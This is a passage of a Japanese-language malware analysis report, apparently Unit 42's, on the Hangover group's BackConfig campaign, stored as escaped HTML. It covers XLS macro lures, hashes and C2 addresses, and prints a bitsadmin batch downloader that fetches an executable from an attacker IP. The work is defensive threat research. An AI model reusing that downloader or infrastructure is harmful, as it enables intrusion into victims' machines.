href=\"https:\/\/labs.bitdefender.com\/2017\/09\/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit\/\">\u3053\u306e\u8a18\u4e8b<\/a>\u3067\u6307\u6458\u3055\u308c\u3066\u3044\u308b\u5185\u5bb9\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3057\u305f\u3002Unit 42\u304c2017\u5e74\u5f8c\u534a\u304b\u3089\u4eca\u307e\u3067\u306e\u9593\u306b\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u540c\u69d8\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u78ba\u8a8d\u3057\u305f\u306e\u306f6\u56de\u3060\u3051\u3067\u3059\u304c\u3001\u305d\u308c\u4ee5\u524d\u306e\u591a\u304f\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001Hangover\u30b0\u30eb\u30fc\u30d7\u304c\u4f7f\u7528\u3059\u308b\u30ab\u30b9\u30bf\u30e0\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5207\u308a\u66ff\u3048\u3089\u308c\u305f\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3068\u8003\u3048\u3089\u308c\u307e\u3059\u3002\u904e\u53bb\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u6700\u8fd1\u306eBackConfig\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u9593\u306b\u3001\u91cd\u8907\u3059\u308b\u3044\u304f\u3064\u304b\u306e\u6226\u8853\u3001\u624b\u6cd5\u3001\u304a\u3088\u3073\u624b\u9806(TTP)\u304c\u5b58\u5728\u3059\u308b\u306e\u306f\u78ba\u304b\u3067\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">http:\/\/chancetowin.quezknal[.]net\/appstore\/updatepatch\/logs.exe<\/span><\/p>\n<h3><a id=\"post-107263-evolution-of-delivery-payloads\"><\/a>\u914d\u4fe1\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316<\/h3>\n<p>Hangover\u653b\u6483\u8005\u304c\u4f7f\u7528\u3059\u308b\u6700\u65b0\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u65b9\u6cd5\u306e\u8aac\u660e\u3092\u59cb\u3081\u308b\u524d\u306b\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u308bTTP\u306e\u9032\u5316\u306e\u6982\u8981\u3092\u4e0b\u56f3\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107266\" aria-describedby=\"caption-attachment-107266\" style=\"width: 2500px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107266 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-2-evolution-of-delivery-payloads.png\" alt=\"\u56f32. \u914d\u4fe1\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316\" width=\"2500\" height=\"1257\" \/><figcaption id=\"caption-attachment-107266\" class=\"wp-caption-text\">\u56f31. \u914d\u4fe1\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316<\/figcaption><\/figure>\n<p>\u9577\u5e74\u306b\u308f\u305f\u308b\u9032\u5316\u306b\u3082\u304b\u304b\u308f\u3089\u305a\u3001\u76f4\u3059\u306e\u304c\u96e3\u3057\u3044\u7656\u3082\u3042\u308a\u307e\u3059\u3002\u307e\u305a\u3001Unit 42\u304c\u8abf\u67fb\u3057\u305f\u3059\u3079\u3066\u306e\u5175\u5668\u5316\u3055\u308c\u305fXLS\u306f\u3001\u4ee5\u4e0b\u306e\u56f32\u306b\u793a\u3059\u3088\u3046\u306a\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3057\u3066\u88ab\u5bb3\u8005\u3092\u3060\u307e\u3057\u3066\u3001\u30d5\u30a1\u30a4\u30eb\u304c\u7834\u640d\u3057\u3066\u3044\u308b\u306e\u3067\u4f55\u3082\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u306a\u3044\u3001\u307e\u305f\u306f\u3053\u306e\u5f8c\u3082\u4f55\u3082\u30ed\u30fc\u30c9\u3055\u308c\u306a\u3044\u3001\u3068\u601d\u3044\u8fbc\u307e\u305b\u3066\u3044\u307e\u3057\u305f\u3002\u904e\u53bb\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u5225\u306e\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u30c6\u30ad\u30b9\u30c8\u3067\u306f\u3001\u304a\u304b\u3057\u306a\u30b9\u30da\u30eb\u3084\u6587\u6cd5\u304c\u591a\u304f\u898b\u3089\u308c\u307e\u3057\u305f\u3002<\/p>\n<figure id=\"attachment_107268\" aria-describedby=\"caption-attachment-107268\" style=\"width: 644px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107268 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-3-example-fake-error-message-displayed-to.png\" alt=\"\u56f33. \u88ab\u5bb3\u7aef\u672b\u306b\u8868\u793a\u3055\u308c\u308b\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u4f8b\" width=\"644\" height=\"268\" \/><figcaption id=\"caption-attachment-107268\" class=\"wp-caption-text\">\u56f32. \u88ab\u5bb3\u7aef\u672b\u306b\u8868\u793a\u3055\u308c\u308b\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u4f8b<\/figcaption><\/figure>\n<p>\u540c\u69d8\u306b\u3001\u5206\u6790\u3057\u305f\u3059\u3079\u3066\u306eExcel\u6587\u66f8\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u30e1\u30bf\u30c7\u30fc\u30bf\u3067\u306f\u3001\u4f5c\u6210\u8005\u3068\u6700\u7d42\u66f4\u65b0\u8005\u306bTesting\u3068\u3044\u3046\u540c\u3058\u540d\u524d\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u3053\u306e\u5f8c\u306e\u5404\u30b5\u30d6\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u4e0a\u56f3\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u306e\u6700\u65b0\u306e3\u3064\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3\u3067\u793a\u3055\u308c\u308b\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3068\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-107263-milestone-multi-component\"><\/a>2019\u5e74\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3: \u30de\u30eb\u30c1\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8<\/h3>\n<p>\u4e0a\u8a18\u306e\u88683\u306eRegistration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461)\u306f\u3001\u8105\u5a01\u653b\u6483\u8005\u304c\u4f7f\u7528\u3059\u308b\u30eb\u30a2\u30fc\u306e\u7a2e\u985e\u306e\u4f8b\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306eXLS\u3092\u958b\u3044\u3066\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u3092\u6709\u52b9\u306b\u3059\u308b\u3068\u3001\u767d\u80cc\u666f\u306e\u30bb\u30eb\u306e\u4e0a\u306b\u56f33\u306b\u793a\u3059\u753b\u50cf\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u793a\u5506\u3059\u308b\u3088\u3046\u306b\u3001\u3053\u308c\u306f\u767b\u9332\u30d5\u30a9\u30fc\u30e0\u3067\u3042\u308a\u3001\u30d1\u30ad\u30b9\u30bf\u30f3\u653f\u5e9c\u304c\u56fd\u5185\u306e\u4f4f\u5b85\u4e0d\u8db3\u89e3\u6d88\u3092\u652f\u63f4\u3059\u308b\u76ee\u7684\u3067\u5b9f\u65bd\u3059\u308bNaya Pakistan Housing\u30d7\u30ed\u30b0\u30e9\u30e0\u306b\u95a2\u9023\u304c\u3042\u308a\u307e\u3059\u3002\u6709\u8cc7\u683c\u306e\u5e02\u6c11\u306b\u306f\u516c\u52d9\u54e1\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u30012019\u5e7410\u670815\u65e5\u3060\u3063\u305f\u767b\u9332\u30d5\u30a9\u30fc\u30e0\u306e\u7de0\u5207\u304c11\u670815\u65e5\u307e\u3067\u5ef6\u9577\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u300110\u670825\u65e5\u3068\u3044\u3046\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u30bf\u30a4\u30df\u30f3\u30b0\u3068\u30eb\u30a2\u30fc\u304c\u660e\u3089\u304b\u306b\u4fb5\u5bb3\u3059\u308b\u30c1\u30e3\u30f3\u30b9\u306e\u62e1\u5927\u3092\u72d9\u3063\u3066\u306e\u3082\u306e\u3067\u3042\u308b\u3053\u3068\u3092\u610f\u5473\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107270\" aria-describedby=\"caption-attachment-107270\" style=\"width: 1351px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107270 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-4-social-engineering-lure-against-pakistan.png\" alt=\"\u56f34. 2019\u5e7410\u6708\u306b\u4ed5\u639b\u3051\u3089\u308c\u305f\u30d1\u30ad\u30b9\u30bf\u30f3\u653f\u5e9c\u306b\u5bfe\u3059\u308b\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u30eb\u30a2\u30fc\" width=\"1351\" height=\"1618\" \/><figcaption id=\"caption-attachment-107270\" class=\"wp-caption-text\">\u56f33. 2019\u5e7410\u6708\u306b\u4ed5\u639b\u3051\u3089\u308c\u305f\u30d1\u30ad\u30b9\u30bf\u30f3\u653f\u5e9c\u306b\u5bfe\u3059\u308b\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u30eb\u30a2\u30fc<\/figcaption><\/figure>\n<p>\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u57f7\u7b46\u6642\u70b9\u3067\u554f\u984c\u306ePHP Web\u30da\u30fc\u30b8\u306f\u5b58\u5728\u3057\u3066\u3044\u306a\u304b\u3063\u305f\u306e\u3067\u3001Unit 42\u306f\u3001XLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u304c\u4e0a\u8a18\u306e\u88683\u306e1\u884c\u76ee\u306b\u793a\u3057\u305fURL\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u3092\u8a3c\u660e\u3067\u304d\u307e\u305b\u3093\u3002\u3057\u304b\u3057\u3001\u4ee5\u4e0b\u306e\u70b9\u3067\u3001\u5f0a\u793e\u306f\u305d\u308c\u3089\u306e2\u3064\u304c\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u5f37\u304f\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>AutoFocus\u3068VirusTotal\u306f2019\u5e7410\u670825\u65e5\u306b\u521d\u3081\u3066\u3053\u306eXLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u3092\u51e6\u7406\u3057\u3066\u3044\u308b<\/li>\n<li>VirusTotal\u306f\u540c\u3058\u65e5\u306bnsaimmigration... URL\u3092\u51e6\u7406\u3057\u3066\u3044\u308b<\/li>\n<li>\u540c\u3058\u65e5\u306bVirusTotal\u3067\u51e6\u7406\u3055\u308c\u305f\u3001nphp_registration_form.php?r=\u3068\u3044\u3046\u7279\u5b9a\u306e\u8a18\u6cd5\u3092\u4f7f\u7528\u3057\u305fHTTP GET\u30ea\u30af\u30a8\u30b9\u30c8URL\u306f\u3001http:\/\/185.203.119[.]184\/fin_div\/session\u306b\u95a2\u9023\u304c\u3042\u308a\u3001\u3053\u308c\u306fXLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u304c\u30c9\u30ed\u30c3\u30d7\u3057\u305fVBS\u30b3\u30fc\u30c9\u306eIP\u30a2\u30c9\u30ec\u30b9\u3068URL\u69cb\u9020\u306b\u4e00\u81f4\u3057\u3066\u3044\u308b<\/li>\n<li>PHP Web\u30da\u30fc\u30b8nphp_registration_form.php\u306e\u540d\u524d\u304c\u3001XLS\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u3068\u95a2\u9023\u304c\u3042\u308b<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<p>XLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u306eVBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306f\u3001\u305d\u308c\u4ee5\u524d\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u3082\u306e\u3068\u306f\u591a\u5c11\u7570\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fEXE\u30d5\u30a1\u30a4\u30eb\u3092\u76f4\u63a5\u4fdd\u5b58\u3057\u305f\u308a\u3001VBA\u30b3\u30fc\u30c9\u81ea\u4f53\u304c\u76f4\u63a5\u30d0\u30c3\u30c1\u30b7\u30a7\u30eb\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u305f\u308a\u3059\u308b\u306e\u3067\u306f\u306a\u304f\u3001Excel\u30b7\u30fc\u30c8\u306e27\u5217\u76ee\u307e\u305f\u306fAA\u5217(\u307b\u3068\u3093\u3069\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u753b\u9762\u3067\u3001\u3053\u306e\u5217\u306f\u8868\u793a\u3055\u308c\u3066\u3044\u306a\u3044\u53ef\u80fd\u6027\u304c\u9ad8\u3044)\u304b\u3089\u59cb\u307e\u308b\u975e\u8868\u793a\u5217\u306e\u5185\u5bb9\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u30d5\u30a9\u30f3\u30c8\u306e\u8272\u304c\u5909\u5316\u3057\u305f\u5f8c\u3001\u4ee5\u4e0b\u306e\u56f34\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u53e4\u3044\u4e9c\u7a2e\u3068\u540c\u3058\u300csetup\u300d\u30d0\u30c3\u30c1 \u30b3\u30fc\u30c9 \u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3068\u65b0\u3057\u3044Visual Basic Script (VBS)\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u304c\u3001AA\u5217\u3068AB\u5217\u306b\u305d\u308c\u305e\u308c\u8868\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107272\" aria-describedby=\"caption-attachment-107272\" style=\"width: 1704px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107272 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-5-vbs-downloader-and-bat-setup-file-reveal.png\" alt=\"\u56f35. XLS\u306e\u30b7\u30fc\u30c8\u306b\u8868\u793a\u3055\u308c\u305fVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3068BAT\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u30d5\u30a1\u30a4\u30eb\" width=\"1704\" height=\"716\" \/><figcaption id=\"caption-attachment-107272\" class=\"wp-caption-text\">\u56f34. XLS\u306e\u30b7\u30fc\u30c8\u306b\u8868\u793a\u3055\u308c\u305fVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3068BAT\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u30d5\u30a1\u30a4\u30eb<\/figcaption><\/figure>\n<p>XLS\u306eVBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306f\u30012\u3064\u306e\u5217\u306e\u5185\u5bb9\u30921\u884c\u305a\u3064\u89e3\u6790\u3057\u3001\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u305d\u308c\u305e\u308c\u66f8\u304d\u51fa\u3057\u3066\u3001\u4ee5\u4e0b\u306e\u56f35\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u306e\u3068\u540c\u3058\u30d7\u30ed\u30bb\u30b9\u30d5\u30ed\u30fc\u306b\u5f93\u3063\u3066\u305d\u308c\u3089\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-107263-milestone-bits-and-zips\"><\/a>2019\u5e74\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3: BITS\u3068ZIP<\/h3>\n<p>2019\u5e7411\u670815\u65e5\u306b\u3001WildFire\u304c\u6700\u8fd1\u78ba\u8a8d\u3057\u305f\u5175\u5668\u5316\u3055\u308c\u305fXLS\u30d5\u30a1\u30a4\u30eb(SHA256: 021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b)\u3092\u5206\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u3044\u304f\u3064\u304b\u306e\u65b0\u3057\u3044\u624b\u6cd5\u304c\u660e\u3089\u304b\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u4eca\u56de\u306f\u3001VBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306b\u3001\u30b5\u30a4\u30ba\u304c1,062\u30d0\u30a4\u30c8\u3057\u304b\u306a\u304410\u9032\u7b26\u53f7\u5316\u3055\u308c\u305fZIP\u30d5\u30a1\u30a4\u30eb\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002ZIP\u30a2\u30fc\u30ab\u30a4\u30d6\u306e\u4e2d\u306b\u306f\u3001driverkit\u30d5\u30a9\u30eb\u30c0\u306b\u89e3\u51cd\u3055\u308c\u308b2\u3064\u306e\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u3042\u308a\u307e\u3057\u305f\u30021\u3064\u306fdriverkit.bat\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u3067\u3001\u524d\u8ff0\u3057\u305f\u300csetup\u300dBAT\u30d5\u30a1\u30a4\u30eb\u3067\u3042\u308a\u3001\u4ed8\u9332\u30bb\u30af\u30b7\u30e7\u30f3\u306e\u30ea\u30b9\u30c8\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3082\u30461\u3064\u306fWinmgt.txt\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u3067\u3001\u524d\u8ff0\u3057\u305fVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3092\u7ffb\u6848\u3057\u305f\u3082\u306e\u3067\u3059\u3002\u305f\u3060\u3057\u3001\u3053\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u3001MSXML DOM\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f7f\u7528\u3057\u3066\u76f4\u63a5HTTP\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u884c\u3046\u306e\u3067\u306f\u306a\u304f\u3001Winmgt_Drive.bat\u306b\u4ee5\u4e0b\u306e\u5185\u5bb9\u3092\u66f8\u304d\u8fbc\u3093\u3067\u3001\u300csetup\u300dBAT\u30d5\u30a1\u30a4\u30eb\u3067\u4f5c\u6210\u3059\u308b3\u756a\u76ee\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3067\u305d\u308c\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">echo off\r\nbitsadmin \/transfer Microsoft_Update \/download \/priority high \r\nhttp:\/\/185.203.119[.]184\/winmgt\/winmgt.exe \r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\winmgt.exe\r\ndel %0<\/pre>\n<h3><a id=\"post-107263-milestone-fine-tuning\"><\/a>2020\u5e74\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3: \u5fae\u8abf\u6574<\/h3>\n<p>\u4ee5\u4e0b\u306b\u793a\u3059\u5b9f\u884c\u30d5\u30ed\u30fc\u56f3\u306f\u3001Unit 42\u304c\u78ba\u8a8d\u3057\u305f\u6700\u65b0\u306e\u5175\u5668\u5316\u3055\u308c\u305f\u6587\u66f8\u306e1\u3064\u3067\u3042\u308bInvoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c\u3001\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u306f2020\u5e741\u670815\u65e5)\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u611f\u67d3\u30d7\u30ed\u30bb\u30b9\u306f\u30011\u3064\u524d\u306e\u30b5\u30d6\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305f\u8907\u6570\u306e\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3067\u69cb\u6210\u3055\u308c\u3066\u3044\u307e\u3059\u3002VBA\u304c\u300csetup\u300d\u30d0\u30c3\u30c1(BAT)\u30d5\u30a1\u30a4\u30eb\u3092\u30c7\u30a3\u30b9\u30af\u4e0a\u306b\u66f8\u304d\u8fbc\u3093\u3067\u5b9f\u884c\u3057\u305f\u5f8c\u306f\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u304cBackConfig\u30d7\u30e9\u30b0\u30a4\u30f3\u30ed\u30fc\u30c0\u30fc\u306e\u611f\u67d3\u30d7\u30ed\u30bb\u30b9\u306e\u5927\u90e8\u5206\u3092\u8abf\u6574\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107274\" aria-describedby=\"caption-attachment-107274\" style=\"width: 800px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-6-execution-flow-of-backconfig-malware.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-107274 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-6-execution-flow-of-backconfig-malware.png\" alt=\"\u56f36. BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u30d5\u30ed\u30fc\" width=\"800\" height=\"998\" \/><\/a><figcaption id=\"caption-attachment-107274\" class=\"wp-caption-text\">\u56f35. BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u30d5\u30ed\u30fc<\/figcaption><\/figure>\n<p>\u56f35\u306b\u3064\u3044\u3066\u3001\u4ee5\u4e0b\u306b\u793a\u3059\u756a\u53f7\u4ed8\u304d\u306e\u7b87\u6761\u66f8\u304d\u30ea\u30b9\u30c8\u3067\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>Drive.txt\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb(SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)\u304c\u4f5c\u6210\u3055\u308c\u300110\u9032\u7b26\u53f7\u5316\u3055\u308c\u305fVBS\u304c\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002<\/li>\n<li>VBA\u30b3\u30fc\u30c9\u306f\u3001\u540c\u3058\u3088\u3046\u306b\u3001Audio.txt\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u306b\u30d0\u30c3\u30c1\u30b3\u30fc\u30c9\u3092\u66f8\u304d\u8fbc\u307f\u307e\u3059\u3002\u4e21\u30d5\u30a1\u30a4\u30eb\u306e\u5185\u5bb9\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u4ed8\u9332\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u793a\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/li>\n<li>Audio.txt\u306e\u540d\u524d\u3092Audio.bat\u306b\u5909\u66f4\u3057\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002<\/li>\n<li>Audio.bat\u306f\u3001\u904e\u53bb\u306e\u611f\u67d3\u306b\u95a2\u9023\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3068\u30d5\u30a9\u30eb\u30c0\u304c\u3042\u308c\u3070\u305d\u308c\u3089\u3092\u6d88\u53bb\u3057\u3066\u3001\u5fc5\u8981\u306a\u74b0\u5883\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u305d\u306e\u4e2d\u306b\u306f\u3001\u524d\u8ff0\u306epid.txt\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3059\u308b\u3053\u3068\u3084\u3001\u3055\u307e\u3056\u307e\u306a\u30d5\u30a9\u30eb\u30c0\u3068\u30d5\u30a1\u30a4\u30eb\u304cWindows\u6a19\u6e96\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30fc\u30e9\u753b\u9762\u306b\u8868\u793a\u3055\u308c\u306a\u3044\u3088\u3046\u306b\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u304c\u542b\u307e\u308c\u307e\u3059\u3002pid.txt\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u3001\u88ab\u5bb3\u8005\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3001\u30cf\u30a4\u30d5\u30f3\u3001\u304a\u3088\u3073\u30e9\u30f3\u30c0\u30e0\u306a\u6570\u5b57\u304c\u7d9a\u3051\u3066\u4e26\u3093\u3067\u3044\u307e\u3059\u304c\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306f\u610f\u56f3\u3057\u305f\u3088\u3046\u306b\u306f\u52d5\u4f5c\u3057\u3066\u3044\u306a\u3044\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/li>\n<li>Audio.bat\u306f\u7d9a\u3051\u3066\u3001\u307e\u3060\u5b58\u5728\u3057\u3066\u3044\u306a\u3044dphc.exe\u3068Drive.vbs\u306e2\u3064\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u53c2\u7167\u3059\u308b2\u3064\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002dphc.exe\u306f10\u5206\u304a\u304d\u3001Drive.vbs\u306f20\u5206\u304a\u304d\u306b\u52d5\u4f5c\u3057\u307e\u3059\u3002<\/li>\n<li>Audio.bat\u306f\u6700\u5f8c\u306b\u3001Drive.txt\u306e\u540d\u524d\u3092Drive.vbs\u306b\u5909\u66f4\u3057\u3066\u3001\u81ea\u3089\u3092\u524a\u9664\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u30bf\u30b9\u30af\u30b9\u30b1\u30b8\u30e5\u30fc\u30e9\u306b\u3088\u3063\u3066Drive.vbs\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002Drive.vbs\u306f\u3001BackConfig\u306e\u5b9f\u884c\u53ef\u80fd\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb8892279f3...\u306e\u5834\u5408\u3001\u30ea\u30e2\u30fc\u30c8\u30ed\u30b1\u30fc\u30b7\u30e7\u30f3\u306fhttp:\/\/185.203.119[.]184\/Dropbox\/request\u3067\u3059\u3002<\/li>\n<li>\u305d\u306e\u5f8c\u3001\u30bf\u30b9\u30af\u30b9\u30b1\u30b8\u30e5\u30fc\u30e9\u306b\u3088\u3063\u3066dphc.exe\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002dphc.exe\u306f\u307e\u305apid.txt 